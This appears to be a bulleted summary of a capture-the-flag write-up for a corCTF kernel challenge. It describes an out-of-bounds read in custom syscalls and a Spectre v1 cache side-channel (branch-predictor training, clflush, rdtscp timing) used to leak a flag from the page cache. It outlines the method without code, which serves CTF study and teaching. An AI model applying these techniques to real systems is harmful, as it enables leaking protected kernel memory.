Challenge Overview: Based on corCTF 2023 theme, released an exploitation challenge connecting kernel internals and x86_64 micro-architectural attacks.

• New Syscall on Linux 6.9.0: Presented corctf_write_note and corctf_read_note syscalls.
• QEMU Boot Command: Ran on an initramfs with specific QEMU boot command.

Vulnerabilities and Exploits:

• OOB Read Bug in corctf_read_note: Allows out-of-bounds read, but may not lead to LPE exploit due to oops=panic.
• Side-Channel Problem: Cache side-channel through unchecked index in copy_to_user can leak memory value information.
• Using Spectre v1 to Leak Flag: Trained branch predictor with corctf_read to time accesses and leak flag from filesystem cache.
• Prerequisites: KASLR and physmap base leaks, and knowledge of file offset from physical memory base.

Implementation Details:

• Cache Flushing and Timing Functions: clflush to flush buffer from cache, rdtscp to time accesses.
• Spectre Function: Trains branch predictor and times access to a pre-specified offset.
• Side-Channel Primitive: Measures access times to determine the original value.